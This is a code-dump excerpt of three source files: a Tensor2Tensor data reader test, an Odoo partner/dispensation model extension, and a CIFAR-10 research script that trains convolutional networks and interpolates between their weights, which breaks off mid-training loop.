waterblue13/tensor2tensor | tensor2tensor/utils/data_reader_test.py | 1 | 10073 | # coding=utf-8
# Copyright 2017 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Data reader test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
# Dependency imports
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensor2tensor.data_generators import generator_utils
from tensor2tensor.data_generators import problem as problem_mod
from tensor2tensor.utils import data_reader
from tensor2tensor.utils import registry
import tensorflow as tf
@registry.register_problem
class TestProblem(problem_mod.Problem):
def generator(self, data_dir, tmp_dir, is_training):
for i in xrange(30):
yield {"inputs": [i] * (i + 1), "targets": [i], "floats": [i + 0.5]}
def generate_data(self, data_dir, tmp_dir, task_id=-1):
train_paths = self.training_filepaths(data_dir, 1, shuffled=True)
dev_paths = self.dev_filepaths(data_dir, 1, shuffled=True)
generator_utils.generate_files(
self.generator(data_dir, tmp_dir, True), train_paths)
generator_utils.generate_files(
self.generator(data_dir, tmp_dir, False), dev_paths)
def hparams(self, defaults, model_hparams):
pass
def example_reading_spec(self):
data_fields = {
"inputs": tf.VarLenFeature(tf.int64),
"targets": tf.VarLenFeature(tf.int64),
"floats": tf.VarLenFeature(tf.float32),
}
data_items_to_decoders = None
return (data_fields, data_items_to_decoders)
def preprocess_example(self, example, unused_mode, unused_hparams):
example["new_field"] = tf.constant([42.42])
return example
def generate_test_data(problem, tmp_dir):
problem.generate_data(tmp_dir, tmp_dir)
filepatterns = data_reader.get_data_filepatterns(
problem.name, tmp_dir, tf.estimator.ModeKeys.TRAIN)
assert tf.gfile.Glob(filepatterns[0])
return filepatterns
class DataReaderTest(tf.test.TestCase):
@classmethod
def setUpClass(cls):
tf.set_random_seed(1)
cls.problem = registry.problem("test_problem")
cls.filepatterns = generate_test_data(cls.problem, tempfile.gettempdir())
@classmethod
def tearDownClass(cls):
# Clean up files
for fp in cls.filepatterns:
files = tf.gfile.Glob(fp)
for f in files:
os.remove(f)
def testBasicExampleReading(self):
dataset = data_reader.read_examples(self.problem, self.filepatterns[0], 32)
examples = dataset.make_one_shot_iterator().get_next()
with tf.train.MonitoredSession() as sess:
# Check that there are multiple examples that have the right fields of the
# right type (lists of int/float).
for _ in xrange(10):
ex_val = sess.run(examples)
inputs, targets, floats = (ex_val["inputs"], ex_val["targets"],
ex_val["floats"])
self.assertEqual(np.int64, inputs.dtype)
self.assertEqual(np.int64, targets.dtype)
self.assertEqual(np.float32, floats.dtype)
for field in [inputs, targets, floats]:
self.assertGreater(len(field), 0)
def testTrainEvalBehavior(self):
train_dataset = data_reader.read_examples(self.problem,
self.filepatterns[0], 16)
train_examples = train_dataset.make_one_shot_iterator().get_next()
eval_dataset = data_reader.read_examples(
self.problem,
self.filepatterns[0],
16,
mode=tf.estimator.ModeKeys.EVAL)
eval_examples = eval_dataset.make_one_shot_iterator().get_next()
eval_idxs = []
with tf.train.MonitoredSession() as sess:
# Train should be shuffled and run through infinitely
for i in xrange(30):
self.assertNotEqual(i, sess.run(train_examples)["inputs"][0])
# Eval should not be shuffled and only run through once
for i in xrange(30):
self.assertEqual(i, sess.run(eval_examples)["inputs"][0])
eval_idxs.append(i)
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(eval_examples)
# Should never run because above line should error
eval_idxs.append(30)
# Ensuring that the above exception handler actually ran and we didn't
# exit the MonitoredSession context.
eval_idxs.append(-1)
self.assertAllEqual(list(range(30)) + [-1], eval_idxs)
def testPreprocess(self):
dataset = data_reader.read_examples(self.problem, self.filepatterns[0], 32)
examples = dataset.make_one_shot_iterator().get_next()
examples = data_reader._preprocess(examples, self.problem, None, None)
with tf.train.MonitoredSession() as sess:
ex_val = sess.run(examples)
# problem.preprocess_example has been run
self.assertAllClose([42.42], ex_val["new_field"])
# int64 has been cast to int32
self.assertEqual(np.int32, ex_val["inputs"].dtype)
self.assertEqual(np.int32, ex_val["targets"].dtype)
self.assertEqual(np.float32, ex_val["floats"].dtype)
def testLengthFilter(self):
max_len = 15
dataset = data_reader.read_examples(self.problem, self.filepatterns[0], 32)
dataset = dataset.filter(
lambda ex: data_reader.example_valid_size(ex, max_len))
examples = dataset.make_one_shot_iterator().get_next()
with tf.train.MonitoredSession() as sess:
ex_lens = []
for _ in xrange(max_len):
ex_lens.append(len(sess.run(examples)["inputs"]))
self.assertAllEqual(list(range(1, max_len + 1)), sorted(ex_lens))
def testBatchingSchemeMaxLength(self):
scheme = data_reader._batching_scheme(
batch_size=20, max_length=None,
min_length_bucket=8, length_bucket_step=1.1,
drop_long_sequences=False)
self.assertGreater(scheme["max_length"], 10000)
scheme = data_reader._batching_scheme(
batch_size=20, max_length=None,
min_length_bucket=8, length_bucket_step=1.1,
drop_long_sequences=True)
self.assertEqual(scheme["max_length"], 20)
scheme = data_reader._batching_scheme(
batch_size=20, max_length=15,
min_length_bucket=8, length_bucket_step=1.1,
drop_long_sequences=True)
self.assertEqual(scheme["max_length"], 15)
scheme = data_reader._batching_scheme(
batch_size=20, max_length=15,
min_length_bucket=8, length_bucket_step=1.1,
drop_long_sequences=False)
self.assertGreater(scheme["max_length"], 10000)
def testBatchingSchemeBuckets(self):
scheme = data_reader._batching_scheme(
batch_size=128,
max_length=0,
min_length_bucket=8,
length_bucket_step=1.1)
boundaries, batch_sizes = scheme["boundaries"], scheme["batch_sizes"]
self.assertEqual(len(boundaries), len(batch_sizes) - 1)
expected_boundaries = [
8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 22, 24, 26, 28,
30, 33, 36, 39, 42, 46, 50, 55, 60, 66, 72, 79, 86, 94, 103, 113, 124]
self.assertEqual(expected_boundaries, boundaries)
expected_batch_sizes = [
16, 12, 12, 8, 8, 8, 8, 8, 8, 6, 6, 6, 6, 4, 4, 4, 4, 4, 3, 3, 3,
3, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1]
self.assertEqual(expected_batch_sizes, batch_sizes)
scheme = data_reader._batching_scheme(
batch_size=128,
max_length=0,
min_length_bucket=8,
length_bucket_step=1.1,
shard_multiplier=2)
boundaries, batch_sizes = scheme["boundaries"], scheme["batch_sizes"]
self.assertAllEqual([bs * 2 for bs in expected_batch_sizes], batch_sizes)
self.assertEqual(expected_boundaries, boundaries)
scheme = data_reader._batching_scheme(
batch_size=128,
max_length=0,
min_length_bucket=8,
length_bucket_step=1.1,
length_multiplier=2)
boundaries, batch_sizes = scheme["boundaries"], scheme["batch_sizes"]
self.assertAllEqual([b * 2 for b in expected_boundaries], boundaries)
self.assertEqual([max(1, bs // 2)
for bs in expected_batch_sizes], batch_sizes)
def testBucketBySeqLength(self):
def example_len(ex):
return tf.shape(ex["inputs"])[0]
boundaries = [10, 20, 30]
batch_sizes = [10, 8, 4, 2]
window_size = 40
dataset = data_reader.read_examples(
self.problem,
self.filepatterns[0],
32,
mode=tf.estimator.ModeKeys.EVAL)
dataset = data_reader.bucket_by_sequence_length(
dataset, example_len,
boundaries, batch_sizes, window_size)
batch = dataset.make_one_shot_iterator().get_next()
input_vals = []
obs_batch_sizes = []
with tf.train.MonitoredSession() as sess:
# Until OutOfRangeError
while True:
batch_val = sess.run(batch)
batch_inputs = batch_val["inputs"]
batch_size, max_len = batch_inputs.shape
obs_batch_sizes.append(batch_size)
for inputs in batch_inputs:
input_val = inputs[0]
input_vals.append(input_val)
# The inputs were constructed such that they were repeated value+1
# times (i.e. if the inputs value is 7, the example has 7 repeated 8
# times).
repeat = input_val + 1
# Check padding
self.assertAllEqual([input_val] * repeat + [0] * (max_len - repeat),
inputs)
# Check that all inputs came through
self.assertEqual(list(range(30)), sorted(input_vals))
# Check that we saw variable batch size
self.assertTrue(len(set(obs_batch_sizes)) > 1)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | -13,984,561,040,291,444 | 35.103943 | 80 | 0.654026 | false |
CLVsol/odoo_addons | clv_medicament_dispensation_ext/res_partner/res_partner.py | 1 | 1905 | # -*- encoding: utf-8 -*-
################################################################################
# #
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
from openerp import models, fields, api
class clv_medicament_dispensation_ext(models.Model):
_inherit = 'clv_medicament_dispensation_ext'
partner_id = fields.Many2one('res.partner', 'Partner')
class res_partner(models.Model):
_inherit = 'res.partner'
medicament_dispensation_ext_ids = fields.One2many('clv_medicament_dispensation_ext',
'partner_id',
'Dispensations (Ext)')
| agpl-3.0 | 3,682,331,894,238,898,700 | 58.53125 | 88 | 0.447244 | false |
danielfreeman11/convex-nets | LaunchScripts/CIFAR10.py | 1 | 29360 | #Imports and model parameters
from __future__ import absolute_import
from __future__ import division
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
#mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
#Simple network: Given three integers a,b,c, [-100,100] chooses three random x-values, and evaluates
#the quadratic function a*x^2 + b*x + c at those values.
import copy
from datetime import datetime
import os.path
import time
import math
import gzip
import os
import re
import sys
import tarfile
from six.moves import urllib
import tensorflow as tf
from tensorflow.models.image.cifar10 import cifar10_input
from tensorflow.models.image.cifar10 import cifar10
for num_run in xrange(1):
alpha,hidden_dim,hidden_dim2 = (.001,4,4)
thresh = .95
if num_run%4 == 0:
thresh = .8
if num_run%4 == 1:
thresh = .6
if num_run%4 == 2:
thresh = .4
if num_run%4 == 3:
thresh = .35
cost_thresh = 1.0
# Parameters
learning_rate = 0.001
training_epochs = 15
#batch_size = 100
display_step = 1
# Network Parameters
n_hidden_1 = 256 # 1st layer number of features
n_hidden_2 = 256 # 2nd layer number of features
n_input = 784 # Guess quadratic function
n_classes = 10 #
#synapses = []
#from __future__ import print_function
tf.logging.set_verbosity(tf.logging.FATAL)
FLAGS = tf.app.flags.FLAGS
# Basic model parameters.
batch_size = 128
data_dir = '/tmp/cifar10_data'
use_fp16 = False
train_dir= '/tmp/cifar10_train'
max_steps=1000000
num_examples=10000
log_device_placement=False
# Global constants describing the CIFAR-10 data set.
IMAGE_SIZE = cifar10_input.IMAGE_SIZE
NUM_CLASSES = cifar10_input.NUM_CLASSES
NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = cifar10_input.NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN
NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = cifar10_input.NUM_EXAMPLES_PER_EPOCH_FOR_EVAL
# Constants describing the training process.
MOVING_AVERAGE_DECAY = 0.9999 # The decay to use for the moving average.
NUM_EPOCHS_PER_DECAY = 350.0 # Epochs after which learning rate decays.
LEARNING_RATE_DECAY_FACTOR = 0.1 # Learning rate decay factor.
INITIAL_LEARNING_RATE = 0.1 # Initial learning rate.
# If a model is trained with multiple GPUs, prefix all Op names with tower_name
# to differentiate the operations. Note that this prefix is removed from the
# names of the summaries when visualizing a model.
TOWER_NAME = 'tower'
DATA_URL = 'http://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz'
models = []
#Testing starting in the same place
#synapse0 = 2*np.random.random((1,hidden_dim)) - 1
#synapse1 = 2*np.random.random((hidden_dim,hidden_dim2)) - 1
#synapse2 = 2*np.random.random((hidden_dim2,1)) - 1
#Function definitions
def func(x,a,b,c):
return x*x*a + x*b + c
def flatten(x):
result = []
for el in x:
if hasattr(el, "__iter__") and not isinstance(el, basestring):
result.extend(flatten(el))
else:
result.append(el)
return result
def generatecandidate4(a,b,c,tot):
candidate = [[np.random.random() for x in xrange(1)] for y in xrange(tot)]
candidatesolutions = [[func(x[0],a,b,c)] for x in candidate]
return (candidate, candidatesolutions)
def synapse_interpolate(synapse1, synapse2, t):
return (synapse2-synapse1)*t + synapse1
def model_interpolate(w1,b1,w2,b2,t):
m1w = w1
m1b = b1
m2w = w2
m2b = b2
mwi = [synapse_interpolate(m1we,m2we,t) for m1we, m2we in zip(m1w,m2w)]
mbi = [synapse_interpolate(m1be,m2be,t) for m1be, m2be in zip(m1b,m2b)]
return mwi, mbi
def InterpBeadError(w1,b1, w2,b2, write = False, name = "00"):
errors = []
#xdat,ydat = generatecandidate4(.5, .25, .1, 1000)
#xdat,ydat = mnist.train.next_batch(1000)
#xdat = mnist.test.images
#ydat = mnist.test.labels
#xdat = np.array(xdat)
#ydat = np.array(ydat)
for tt in xrange(20):
#print tt
#accuracy = 0.
t = tt/20.
thiserror = 0
#x0 = tf.placeholder("float", [None, n_input])
#y0 = tf.placeholder("float", [None, n_classes])
weights, biases = model_interpolate(w1,b1,w2,b2, t)
#interp_model = multilayer_perceptron(w=weights, b=biases)
interp_model = convnet(w=weights, b=biases)
with interp_model.g.as_default():
xdat, ydat = cifar10.inputs(eval_data='test')
logit_test = interp_model.predict(xdat)
top_k_op = tf.nn.in_top_k(logit_test, ydat, 1)
pred = interp_model.predict(xdat)
init = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init)
tf.train.start_queue_runners(sess=sess)
num_iter = 20
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * batch_size
step = 0
while step < num_iter:
predictions = sess.run([top_k_op])
true_count += np.sum(predictions)
step += 1
precision = true_count / total_sample_count
print "Accuracy:", precision
#,"\t",tt,weights[0][1][0],weights[0][1][1]
thiserror = 1 - precision
errors.append(thiserror)
if write == True:
with open("f" + str(name) + ".out",'w+') as f:
for e in errors:
f.write(str(e) + "\n")
return max(errors), np.argmax(errors)
def _activation_summary(x):
"""Helper to create summaries for activations.
Creates a summary that provides a histogram of activations.
Creates a summary that measures the sparsity of activations.
Args:
x: Tensor
Returns:
nothing
"""
# Remove 'tower_[0-9]/' from the name in case this is a multi-GPU training
# session. This helps the clarity of presentation on tensorboard.
tensor_name = re.sub('%s_[0-9]*/' % TOWER_NAME, '', x.op.name)
tf.histogram_summary(tensor_name + '/activations', x)
tf.scalar_summary(tensor_name + '/sparsity', tf.nn.zero_fraction(x))
def _variable_on_cpu(name, shape, initializer):
"""Helper to create a Variable stored on CPU memory.
Args:
name: name of the variable
shape: list of ints
initializer: initializer for Variable
Returns:
Variable Tensor
"""
with tf.device('/cpu:0'):
dtype = tf.float16 if False else tf.float32
var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
return var
def _variable_with_weight_decay(name, shape, stddev, wd):
"""Helper to create an initialized Variable with weight decay.
Note that the Variable is initialized with a truncated normal distribution.
A weight decay is added only if one is specified.
Args:
name: name of the variable
shape: list of ints
stddev: standard deviation of a truncated Gaussian
wd: add L2Loss weight decay multiplied by this float. If None, weight
decay is not added for this Variable.
Returns:
Variable Tensor
"""
dtype = tf.float16 if False else tf.float32
var = _variable_on_cpu(
name,
shape,
tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))
if wd is not None:
weight_decay = tf.mul(tf.nn.l2_loss(var), wd, name='weight_loss')
tf.add_to_collection('losses', weight_decay)
return var
def distorted_inputs():
"""Construct distorted input for CIFAR training using the Reader ops.
Returns:
images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.
labels: Labels. 1D tensor of [batch_size] size.
Raises:
ValueError: If no data_dir
"""
if not FLAGS.data_dir:
raise ValueError('Please supply a data_dir')
data_dir = os.path.join(FLAGS.data_dir, 'cifar-10-batches-bin')
images, labels = cifar10_input.distorted_inputs(data_dir=data_dir,
batch_size=FLAGS.batch_size)
if False:
images = tf.cast(images, tf.float16)
labels = tf.cast(labels, tf.float16)
return images, labels
def inputs(eval_data):
"""Construct input for CIFAR evaluation using the Reader ops.
Args:
eval_data: bool, indicating if one should use the train or eval data set.
Returns:
images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.
labels: Labels. 1D tensor of [batch_size] size.
Raises:
ValueError: If no data_dir
"""
if not FLAGS.data_dir:
raise ValueError('Please supply a data_dir')
data_dir = os.path.join(FLAGS.data_dir, 'cifar-10-batches-bin')
images, labels = cifar10_input.inputs(eval_data=eval_data,
data_dir=data_dir,
batch_size=FLAGS.batch_size)
if False:
images = tf.cast(images, tf.float16)
labels = tf.cast(labels, tf.float16)
return images, labels
#Class definitions
class convnet():
def __init__(self, w=0, b=0, ind='00'):
self.index = ind
learning_rate = .001
training_epochs = 15
batch_size = 100
display_step = 1
# Network Parameters
n_hidden_1 = 256 # 1st layer number of features
n_hidden_2 = 256 # 2nd layer number of features
n_input = 784 # Guess quadratic function
n_classes = 10 #
self.g = tf.Graph()
self.params = []
with self.g.as_default():
#Note that by default, weights and biases will be initialized to random normal dists
if w==0:
self.weights = {
'c1': _variable_with_weight_decay('c1',shape=[5, 5, 3, 64],stddev=5e-2,wd=0.0),
'c2': _variable_with_weight_decay('c2',shape=[5, 5, 64, 64],stddev=5e-2,wd=0.0),
'fc1': _variable_with_weight_decay('fc1', shape=[2304, 384],stddev=0.04, wd=0.004),
'fc2': _variable_with_weight_decay('fc2', shape=[384, 192],stddev=0.04, wd=0.004),
'out': _variable_with_weight_decay('out', [192, NUM_CLASSES],stddev=1/192.0, wd=0.0)
}
self.weightslist = [self.weights['c1'],self.weights['c2'],self.weights['fc1'],self.weights['fc2'],self.weights['out']]
self.biases = {
'b1': _variable_on_cpu('b1', [64], tf.constant_initializer(0.0)),
'b2': _variable_on_cpu('b2', [64], tf.constant_initializer(0.1)),
'b3': _variable_on_cpu('b3', [384], tf.constant_initializer(0.1)),
'b4': _variable_on_cpu('b4', [192], tf.constant_initializer(0.1)),
'out': _variable_on_cpu('bo', [NUM_CLASSES],tf.constant_initializer(0.0))
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['b3'],self.biases['b4'],self.biases['out']]
else:
self.weights = {
'c1': tf.Variable(w[0]),
'c2': tf.Variable(w[1]),
'fc1': tf.Variable(w[2]),
'fc2': tf.Variable(w[3]),
'out': tf.Variable(w[4])
}
self.weightslist = [self.weights['c1'],self.weights['c2'],self.weights['fc1'],self.weights['fc2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(b[0]),
'b2': tf.Variable(b[1]),
'b3': tf.Variable(b[2]),
'b4': tf.Variable(b[3]),
'out': tf.Variable(b[4])
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['b3'],self.biases['b4'],self.biases['out']]
self.saver = tf.train.Saver()
def predict(self, x):
with self.g.as_default():
layer_1 = tf.nn.conv2d(x, self.weights['c1'], [1, 1, 1, 1], padding='SAME')
layer_1 = tf.nn.bias_add(layer_1, self.biases['b1'])
layer_1 = tf.nn.relu(layer_1, name='layer_1')
#_activation_summary(layer_1)
pool_1 = tf.nn.max_pool(layer_1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1],padding='SAME', name='pool1')
norm_1 = tf.nn.lrn(pool_1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,name='norm1')
layer_2 = tf.nn.conv2d(norm_1, self.weights['c2'], [1, 1, 1, 1], padding='SAME')
layer_2 = tf.nn.bias_add(layer_2, self.biases['b2'])
layer_2 = tf.nn.relu(layer_2, name='layer_2')
#_activation_summary(layer_2)
norm_2 = tf.nn.lrn(layer_2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,name='norm2')
pool_2 = tf.nn.max_pool(norm_2, ksize=[1, 3, 3, 1],strides=[1, 2, 2, 1], padding='SAME', name='pool2')
reshape = tf.reshape(pool_2, [FLAGS.batch_size, -1])
layer_3 = tf.nn.relu(tf.matmul(reshape, self.weights['fc1']) + self.biases['b3'], name='fc1')
#_activation_summary(layer_3)
layer_4 = tf.nn.relu(tf.matmul(layer_3, self.weights['fc2']) + self.biases['b4'], name='fc2')
#_activation_summary(layer_4)
out_layer = tf.add(tf.matmul(layer_4, self.weights['out']), self.biases['out'], name='out')
#_activation_summary(out)
return out_layer
def ReturnParamsAsList(self):
with self.g.as_default():
with tf.Session() as sess:
# Restore variables from disk
self.saver.restore(sess, "/home/dfreeman/PythonFun/tmp/model"+str(self.index)+".ckpt")
return sess.run(self.weightslist), sess.run(self.biaseslist)
class multilayer_perceptron():
#weights = {}
#biases = {}
def __init__(self, w=0, b=0, ind='00'):
self.index = ind #used for reading values from file
#See the filesystem convention below (is this really necessary?)
#I'm going to eschew writing to file for now because I'll be generating too many files
#Currently, the last value of the parameters is stored in self.params to be read
learning_rate = 0.001
training_epochs = 15
batch_size = 100
display_step = 1
# Network Parameters
n_hidden_1 = 256 # 1st layer number of features
n_hidden_2 = 256 # 2nd layer number of features
n_input = 784 # Guess quadratic function
n_classes = 10 #
self.g = tf.Graph()
self.params = []
with self.g.as_default():
#Note that by default, weights and biases will be initialized to random normal dists
if w==0:
self.weights = {
'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),
'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))
}
self.weightslist = [self.weights['h1'],self.weights['h2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(tf.random_normal([n_hidden_1])),
'b2': tf.Variable(tf.random_normal([n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_classes]))
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['out']]
else:
self.weights = {
'h1': tf.Variable(w[0]),
'h2': tf.Variable(w[1]),
'out': tf.Variable(w[2])
}
self.weightslist = [self.weights['h1'],self.weights['h2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(b[0]),
'b2': tf.Variable(b[1]),
'out': tf.Variable(b[2])
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['out']]
self.saver = tf.train.Saver()
def UpdateWeights(self, w, b):
with self.g.as_default():
self.weights = {
'h1': tf.Variable(w[0]),
'h2': tf.Variable(w[1]),
'out': tf.Variable(w[2])
}
self.weightslist = [self.weights['h1'],self.weights['h2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(b[0]),
'b2': tf.Variable(b[1]),
'out': tf.Variable(b[2])
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['out']]
def predict(self, x):
with self.g.as_default():
layer_1 = tf.add(tf.matmul(x, self.weights['h1']), self.biases['b1'])
layer_1 = tf.nn.relu(layer_1)
# Hidden layer with RELU activation
layer_2 = tf.add(tf.matmul(layer_1, self.weights['h2']), self.biases['b2'])
layer_2 = tf.nn.relu(layer_2)
# Output layer with linear activation
out_layer = tf.matmul(layer_2, self.weights['out']) + self.biases['out']
return out_layer
def ReturnParamsAsList(self):
with self.g.as_default():
with tf.Session() as sess:
# Restore variables from disk
self.saver.restore(sess, "/home/dfreeman/PythonFun/tmp/model"+str(self.index)+".ckpt")
return sess.run(self.weightslist), sess.run(self.biaseslist)
class WeightString:
def __init__(self, w1, b1, w2, b2, numbeads, threshold):
self.w1 = w1
self.w2 = w2
self.b1 = b1
self.b2 = b2
#self.w2, self.b2 = m2.params
self.AllBeads = []
self.threshold = threshold
self.AllBeads.append([w1,b1])
for n in xrange(numbeads):
ws,bs = model_interpolate(w1,b1,w2,b2, (n + 1.)/(numbeads+1.))
self.AllBeads.append([ws,bs])
self.AllBeads.append([w2,b2])
self.ConvergedList = [False for f in xrange(len(self.AllBeads))]
self.ConvergedList[0] = True
self.ConvergedList[-1] = True
def SpringNorm(self, order):
totalweights = 0.
totalbiases = 0.
totaltotal = 0.
#Energy between mobile beads
for i,b in enumerate(self.AllBeads):
if i < len(self.AllBeads)-1:
#print "Tallying energy between bead " + str(i) + " and bead " + str(i+1)
subtotalw = 0.
subtotalb = 0.
#for j in xrange(len(b)):
subtotalw += np.linalg.norm(np.subtract(flatten(self.AllBeads[i][0]),flatten(self.AllBeads[i+1][0])),ord=order)#/len(self.beads[0][j])
#for j in xrange(len(b)):
subtotalb += np.linalg.norm(np.subtract(flatten(self.AllBeads[i][1]),flatten(self.AllBeads[i+1][1])),ord=order)#/len(self.beads[0][j])
totalweights+=subtotalw
totalbiases+=subtotalb
totaltotal+=subtotalw + subtotalb
weightdist = np.linalg.norm(np.subtract(flatten(self.AllBeads[0][0]),flatten(self.AllBeads[-1][0])),ord=order)
biasdist = np.linalg.norm(np.subtract(flatten(self.AllBeads[0][1]),flatten(self.AllBeads[-1][1])),ord=order)
totaldist = np.linalg.norm(np.subtract(flatten(self.AllBeads[0]),flatten(self.AllBeads[-1])),ord=order)
return [totalweights,totalbiases,totaltotal, weightdist, biasdist, totaldist]#/len(self.beads)
def SGDBead(self, bead, thresh, maxindex):
finalerror = 0.
#thresh = .05
# Parameters
learning_rate = 0.001
training_epochs = 15
batch_size = 100
display_step = 1
curWeights, curBiases = self.AllBeads[bead]
#test_model = multilayer_perceptron(w=curWeights, b=curBiases)
test_model = convnet(w=curWeights, b=curBiases)
with test_model.g.as_default():
global_step = tf.Variable(0, trainable=False)
# Get images and labels for CIFAR-10.
images, labels = cifar10.distorted_inputs()
test_images, test_labels = cifar10.inputs(eval_data='test')
# Build a Graph that computes the logits predictions from the
# inference model.
logits = test_model.predict(images)
logit_test = test_model.predict(test_images)
# Calculate loss.
loss = cifar10.loss(logits, labels)
# Build a Graph that trains the model with one batch of examples and
# updates the model parameters.
train_op = cifar10.train(loss, global_step)
top_k_op = tf.nn.in_top_k(logit_test, test_labels, 1)
# Build an initialization operation to run below.
init = tf.initialize_all_variables()
# Start running operations on the Graph.
#sess = tf.Session(config=tf.ConfigProto(
# log_device_placement=FLAGS.log_device_placement))
with tf.Session(config=tf.ConfigProto(
log_device_placement=False)) as sess:
sess.run(init)
tf.train.start_queue_runners(sess=sess)
step = 0
stopcond = True
while step < max_steps and stopcond:
start_time = time.time()
_, loss_value = sess.run([train_op, loss])
duration = time.time() - start_time
assert not np.isnan(loss_value), 'Model diverged with loss = NaN'
if step % 10 == 0:
num_examples_per_step = batch_size
examples_per_sec = num_examples_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.2f (%.1f examples/sec; %.3f '
'sec/batch)')
print (format_str % (datetime.now(), step, loss_value,
examples_per_sec, sec_per_batch))
if step % 100 == 0:
num_iter = int(math.ceil(num_examples / batch_size))
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * batch_size
stepp = 0
while stepp < num_iter:
predictions = sess.run([top_k_op])
true_count += np.sum(predictions)
stepp += 1
# Compute precision @ 1.
precision = true_count / total_sample_count
print('%s: precision @ 1 = %.3f' % (datetime.now(), precision))
if precision > 1 - thresh:
stopcond = False
test_model.params = sess.run(test_model.weightslist), sess.run(test_model.biaseslist)
self.AllBeads[bead]=test_model.params
finalerror = 1 - precision
print ("Final bead error: ",str(finalerror))
step += 1
return finalerror
#Model generation
#copy_model = multilayer_perceptron(ind=0)
copy_model = convnet(ind=0)
for ii in xrange(2):
'''weights = {
'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),
'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))
}
biases = {
'b1': tf.Variable(tf.random_normal([n_hidden_1])),
'b2': tf.Variable(tf.random_normal([n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_classes]))
}'''
# Construct model with different initial weights
#test_model = multilayer_perceptron(ind=ii)
test_model = convnet(ind=ii)
#Construct model with same initial weights
#test_model = copy.copy(copy_model)
#test_model.index = ii
#print test_model.weights
models.append(test_model)
with test_model.g.as_default():
global_step = tf.Variable(0, trainable=False)
# Get images and labels for CIFAR-10.
images, labels = cifar10.distorted_inputs()
test_images, test_labels = cifar10.inputs(eval_data='test')
# Build a Graph that computes the logits predictions from the
# inference model.
logits = test_model.predict(images)
logit_test = test_model.predict(test_images)
# Calculate loss.
loss = cifar10.loss(logits, labels)
# Build a Graph that trains the model with one batch of examples and
# updates the model parameters.
train_op = cifar10.train(loss, global_step)
top_k_op = tf.nn.in_top_k(logit_test, test_labels, 1)
# Build an initialization operation to run below.
init = tf.initialize_all_variables()
# Start running operations on the Graph.
#sess = tf.Session(config=tf.ConfigProto(
# log_device_placement=FLAGS.log_device_placement))
with tf.Session(config=tf.ConfigProto(
log_device_placement=False)) as sess:
sess.run(init)
tf.train.start_queue_runners(sess=sess)
step = 0
stopcond = True
while step < max_steps and stopcond:
start_time = time.time()
_, loss_value = sess.run([train_op, loss])
duration = time.time() - start_time
assert not np.isnan(loss_value), 'Model diverged with loss = NaN'
if step % 10 == 0:
num_examples_per_step = batch_size
examples_per_sec = num_examples_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.2f (%.1f examples/sec; %.3f '
'sec/batch)')
print (format_str % (datetime.now(), step, loss_value,
examples_per_sec, sec_per_batch))
if step % 100 == 0:
num_iter = int(math.ceil(num_examples / batch_size))
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * batch_size
stepp = 0
while stepp < num_iter:
predictions = sess.run([top_k_op])
true_count += np.sum(predictions)
stepp += 1
# Compute precision @ 1.
precision = true_count / total_sample_count
print('%s: precision @ 1 = %.3f' % (datetime.now(), precision))
if precision > 1 - thresh:
stopcond = False
